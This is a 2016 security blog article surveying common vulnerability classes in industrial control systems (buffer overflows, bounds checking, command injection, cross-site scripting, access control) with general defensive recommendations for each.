Critical infrastructure

Destructive Security Flaws in Industrial Control Systems

September 26, 2016 by Irfan Shakeel

There are many systems that are being used in industries; the Industrial Control System (ICS) is the core system that allows us to monitor and control industrial processes, including those in the oil and gas, nuclear, power transmission and distribution, manufacturing, chemical, and other industries.

There are many highly unbearable security concerns associated with the Industrial Control Systems. When we talk about the security of ICS, it’s completely different from ordinary information systems. It is less about securing data and more about keeping things up and running and about ensuring that the picture displayed on the co

ntrol room screen matches what’s happening on the plant floor.

There are three major requirements that are important to keep in mind while considering the security aspect of an Industrial Control System. The ICS security objectives are typically prioritized as:

  1. Availability
  2. Integrity
  3. Confidentiality

Violating operational requirements while implementing security features in ICS could cause more damage than a cyber-attack.

In 2015, researchers found and reported 189 vulnerabilities in ICS, a slight increase from the 181 vulnerabilities found in 2014. More than 25 of the flaws reported had freely available exploits that make it more trivial, and many other flaws don’t even require an exploit to compromise the system.


Industrial control systems have become a fertile field of research for many attack-minded researchers and companies. Researchers have already reported vulnerabilities. Furthermore, they also have recommended some strategies to prevent those known vulnerabilities.

Buffer Overflow:

Buffer overflow vulnerabilities are the result of programmer error. This usually happens because the programmer only considered what should happen and what could happen by mistake, but not all the “out of the box” possibilities such as exceeding input character length.

It is the state created when a program tries to write more data into a buffer than the space allocated in memory. This results in abnormal operation of the program. In Industrial Control Systems, the buffer overflow vulnerability is disastrous in a context that it allows attackers to supply unexpected data and thus modify program execution.

Buffer overflow is the most widespread kind of vulnerability identified in ICS. The following are example buffer overflow vulnerabilities discovered in ICS products:

  • Heap-based and stack-based buffer overflows allow remote code execution on ICS hosts.
  • Username and password buffer overflows in Web Human-Machine Interface (HMI) Web server.
  • Buffer overflow in ICS Web client.
  • Multiple buffer overflows identified in the network packet parsing application.
  • Buffer overflows in application that accepts command line and process control arguments over the network.
  • Multiple stack-based buffer overflows in communications interface.


There are a few recommendations that can prevent buffer overflow vulnerability in the development process. All the code should be written to validate the user input. By adopting secure programming practices and implementing review and testing in the development process could be susceptible to buffer overflow attacks.

Most buffer overflow identified were in the server applications that process ICS protocol traffic. Therefore, network data bounds, code review, and integrity checking should be implemented.

Bound Checking:

The lack of input validation for values that are expected to be in a certain range, such as array index values, can cause unexpected behavior. The insecure coding practice in development of ICS applications allows an attacker to supply unexpected data and thus modify program execution.

For instance, invalidated input, negative, or too large numbers can be input for array access and cause essential services to crash. The unexpected behavior and effects of this vulnerability can crash the ICS communications service by altering the input value to a negative number or maybe create a DOS scenario due to out of range index.


To avoid such vulnerability to allow attackers to exploit the ICS, Every programmer should be trained in secure coding practices. All the inputs should be validated to avoid bound checking vulnerability. Furthermore, ICS traffic should also be monitored for network data value and integrity checking.

Command Injection

Command injection is a technique that is used by an attacker for the execution of arbitrary commands and code. If command injection is not handled in developing phase, then it might be possible that an attacker injects some special character that was not intended to be executed or create some program disorder. This is the disastrous thing when it comes to an industrial control system as many crucial tasks are being performed by the application.

Command injection vulnerabilities typically occur when:

  • Data enter the application from an untrustworthy source.
  • The data are part of a string that is executed as a command by the application.
  • By executing the command, the application gives an attacker a privilege or capability that the attacker would not otherwise have.

There are two types of command injection commonly found in ICS

  • OS command injection
  • Structured Query Language (SQL) injection

OS command injection executes the OS commands that have been constructed from external input without proper sanitization. Whereas, SQL injection vulnerabilities are more common and generally more exposed to attacks.


To avoid command injection flaw use library calls rather than external processes to recreate the desired functionality. The usage of white-list of all acceptable inputs can also be beneficial that strictly conform to specifications. It can help us to reject any input that does not strictly conform to specifications.

Cross Site Scripting

Cross-site scripting is the most critical vulnerability that allows an attacker to inject code into the web pages generated by the web application that is vulnerable. The malicious code is executed at client side with the privileges of the web server.

The improper sanitization of data causes the cross-site scripting (XSS) vulnerability. However, an XSS attack is unique in the sense that the web application itself unwittingly sends the malicious code to the user.

In Industrial Control Systems the most common attack is the disclosure of user cookies that is carried by using cross-site scripting. It can also manipulate the cookies, compromise the confidential information disclose end user files, install Trojan horse programs or may execute malicious code on the end user systems that is harmful to the crucial systems like ICS.

A script could exploit a vulnerability in the web browser itself, possibly taking over the authorized ICS web client host.


ICS applications should use well-known and tested third-party web servers to serve their web applications. The web server and the application should be thoroughly tested for scripting and other vulnerabilities that can lead to exploit in the system.

The defensive actions to prevent cross-site scripting vulnerability include:

  • ICS Internet access policy.
  • ICS user awareness and training.
  • Coordination of security efforts between corporate IT network and ICS network.
  • Firewall between the ICS network and the information technology network.
  • Up-to-date patches.
  • Web browser and e-mail security.
  • Secure code.

Permissions, Privileges, and Access Controls

Permission, privileges, and access controls define the access levels that enable users to use the systems. As ICS is a critical system, the users should be restricted to their access levels. If access levels or level of authorization is poor or weak, it can be exploited by the attacker to gain unauthorized access to ICS functions. Also, it will allow users to access data or perform actions that they should not be allowed to perform.

The common causes behind the access control and privilege access vulnerability in industrial control systems involves:

  • Access is not restricted to the objects that require it.
  • ICS protocol allowed ICS system hosts to read or overwrite files on other hosts, without any logging.
  • Documentation and configuration information was being shared freely (read only).
  • A remote user can upload a file to any location on the targeted computer.
  • Arbitrary file upload is allowed on ICS hosts.
  • The remote client is allowed to launch any process.
  • ICS service allows anonymous access.


ICS vendors should design their systems to support the least privileges concept. It will allow them to restrict users and tend them to use a system more securely. Additionally, create multiple accounts for functions that require different privileges and also provide default configurations that only allow the least privileges necessary for each account type.

The surety of giving least privilege to each user account is the only way to avoid this vulnerability. It’s also the best way to monitor the activities by the user in the system.

Although, these vulnerabilities are somehow being exploited by the attackers. While the neglecting of developers in the development process of an Industrial Control System plays an important role. So, secure programming should be adopted to avoid such vulnerabilities and create a secure system for such critical task where there is no tolerance for the system to get down or unavailable.

Posted: September 26, 2016
Irfan Shakeel
View Profile

Irfan Shakeel is the founder & CEO of An engineer, penetration tester and a security researcher. He specializes in Network, VoIP Penetration testing and digital forensics. He is the author of the book title “Hacking from Scratch”. He loves to provide training and consultancy services, and working as an independent security researcher.